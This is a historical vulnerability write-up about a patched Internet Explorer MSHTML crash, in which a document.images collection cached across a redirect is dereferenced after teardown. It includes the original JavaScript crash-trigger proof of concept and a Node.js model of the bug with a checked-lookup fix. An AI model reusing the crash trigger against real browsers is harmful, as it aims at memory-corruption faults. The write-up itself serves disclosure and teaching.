Caching a reference to document.images from a newly opened window, then accessing an element from that collection after the window redirected to a new page, caused a crash in MSHTML!CElementCollectionTypeOperations::GetOwnItem. Exploitability was classified as UNKNOWN.

<script language="JavaScript">
var imagesColl;
function main()
{
	// Open a child window whose page will redirect server-side shortly after load.
	var win = window.open("redirect.aspx","","width=200,height=200");

	var wrapper = win.document.createElement("span");
	win.document.appendChild(wrapper);

	myDiv.innerHTML = '<img /><img /><img /><img /><img /><img /><img /><img />';

	// Cache the live collection; it belongs to the document that is about to be replaced.
	imagesColl = win.document.images;

	// Touch the cached collection after the redirect has torn down the original document.
	setTimeout('alert(imagesColl[0])', 3000);
}
</script>

The redirect.aspx page performed a server-side redirect. By the time the setTimeout fired and accessed imagesColl[0], the original document had been replaced. The collection object remained alive in JavaScript but its underlying DOM elements had been torn down, leading to a null dereference inside CElementCollectionTypeOperations::GetOwnItem+0x127 when the collection tried to validate the vtable guard on a freed element.
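As an added illustration (not code from the original report, and not MSHTML's implementation), the following Node.js model shows the lifetime mistake described above next to the ownership check that avoids it. The classes `Element`, `Document`, `ElementCollection` and `Window`, the `tornDown` flag and the `currentImage` helper are hypothetical stand-ins: a live collection keeps a pointer to its owner document's backing store, navigation releases that document's elements, and an unchecked `item` lookup then dereferences a released element, while the checked lookup refuses once the owner document is gone. It also shows the page-side habit of re-acquiring a collection from the window's current document instead of trusting one cached across a redirect.

```javascript
'use strict';

// Hypothetical model of a DOM element; ownerDocument is cleared when it is released.
class Element {
  constructor(tag, ownerDocument) {
    this.tag = tag;
    this.ownerDocument = ownerDocument;
  }
}

// Hypothetical model of a document with a backing array of nodes.
class Document {
  constructor(url) {
    this.url = url;
    this.nodes = [];        // backing store that live collections read from
    this.tornDown = false;  // set once navigation has replaced this document
  }
  createElement(tag) {
    const el = new Element(tag, this);
    this.nodes.push(el);
    return el;
  }
  // Like document.images: a live collection holding the document, not a snapshot.
  get images() {
    return new ElementCollection(this, 'img');
  }
  // Navigation tears the document down: elements are released but the array the
  // collection still points at is left in place, modelling dangling pointers.
  tearDown() {
    for (const el of this.nodes) el.ownerDocument = null;
    this.tornDown = true;
  }
}

class ElementCollection {
  constructor(doc, tag) {
    this.doc = doc;
    this.tag = tag;
    this.nodes = doc.nodes;   // cached pointer to the owner's backing store
  }
  matches() {
    return this.nodes.filter(el => el.tag === this.tag);
  }
  // Unchecked lookup, modelling the crashing path: it trusts the cached backing store
  // and dereferences the element; after teardown ownerDocument is null and this throws.
  itemUnchecked(i) {
    const el = this.matches()[i];
    return el.ownerDocument.url;
  }
  // Checked lookup: verify the owner document is still alive before touching elements.
  item(i) {
    if (this.doc.tornDown) return null;
    const el = this.matches()[i];
    return el === undefined ? null : el;
  }
}

// Hypothetical window: navigate() swaps in a fresh document and tears down the old one.
class Window {
  constructor(url) {
    this.document = new Document(url);
    this.closed = false;
  }
  navigate(url) {
    const old = this.document;
    this.document = new Document(url);
    old.tearDown();
  }
}

// Page-side pattern: a collection cached from another window is only valid while that
// window still shows the same document; otherwise re-acquire it or give up.
function currentImage(win, cachedColl, i) {
  if (win.closed) return null;
  const coll = cachedColl.doc === win.document ? cachedColl : win.document.images;
  return coll.item(i);
}

// Walk through the scenario from the report: cache, redirect, access.
function demo() {
  const win = new Window('redirect.aspx');
  for (let k = 0; k < 8; k++) win.document.createElement('img');
  const imagesColl = win.document.images;            // cached live collection
  const beforeOk = imagesColl.item(0) !== null;      // valid before the redirect

  win.navigate('target.html');                       // server-side redirect lands
  win.document.createElement('img');                 // the new page has one image

  let crashed = false;
  try {
    imagesColl.itemUnchecked(0);                     // released element: throws
  } catch (e) {
    crashed = e instanceof TypeError;
  }
  const checked = imagesColl.item(0);                // null instead of a dereference
  const reacquired = currentImage(win, imagesColl, 0);
  return { beforeOk, crashed, checked, reacquiredUrl: reacquired.ownerDocument.url };
}

module.exports = { Element, Document, ElementCollection, Window, currentImage, demo };
```

Running `demo()` returns `beforeOk: true`, `crashed: true`, `checked: null` and `reacquiredUrl: 'target.html'`: the same cached collection that crashes the unchecked path yields a clean null once the lookup checks its owner, and re-acquiring from `win.document` finds the new page's image.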

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.